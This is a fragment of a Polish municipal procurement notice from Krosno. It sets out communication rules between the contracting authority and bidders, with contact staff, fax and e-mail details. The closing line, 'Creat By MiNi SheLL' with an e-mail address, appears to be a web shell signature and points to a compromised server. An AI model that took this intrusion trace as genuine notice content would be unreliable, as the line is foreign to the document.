1. Oświadczenia, wnioski, zawiadomienia oraz informacje dotyczące postępowania Zamawiający i wykonawcy przekazują pisemnie, drogą mailową lub faksem. Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub pocztą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
2. Powyższe zasady porozumiewania się (tj. faks i e-mail) nie będą miały zastosowania do dokumentów, oświadczeń lub pełnomocnictw składanych w odpowiedzi na wezwanie dokonane przez Zamawiającego w trybie art. 26 ust. 3 Ustawy, ze względu na konieczność zachowania formy tychże oświadczeń lub dokumentów przewidzianej w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) lub przepisów Kodeksu cywilnego w przypadku pełnomocnictwa.
3. Osobami upoważnionymi do kontaktowania się z wykonawcami w powyższy sposób są:
1)	Jolanta Kopciuch-Szmyd  - Wydział Edukacji Urzędu Miasta w Krośnie, ul. Lwowska 28a, w godz. 7.30 do 15.30 - w sprawach merytorycznych,
2)	Małgorzata Wanat lub Adriana Łącka - Stanowisko ds. Zamówień Publicznych Urzędu Miasta w Krośnie, ul. Lwowska 28a, w godz. 7.30 do 15.30 - w sprawach formalno - prawnych;

Sposób porozumiewania się:
a) pisemnie - Krosno, ul. Lwowska 28a, z dopiskiem -Zamówienia publiczne
b) faksem - nr: 0-13 47 43 312
c) drogą mailową - zp@um.krosno.pl

Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com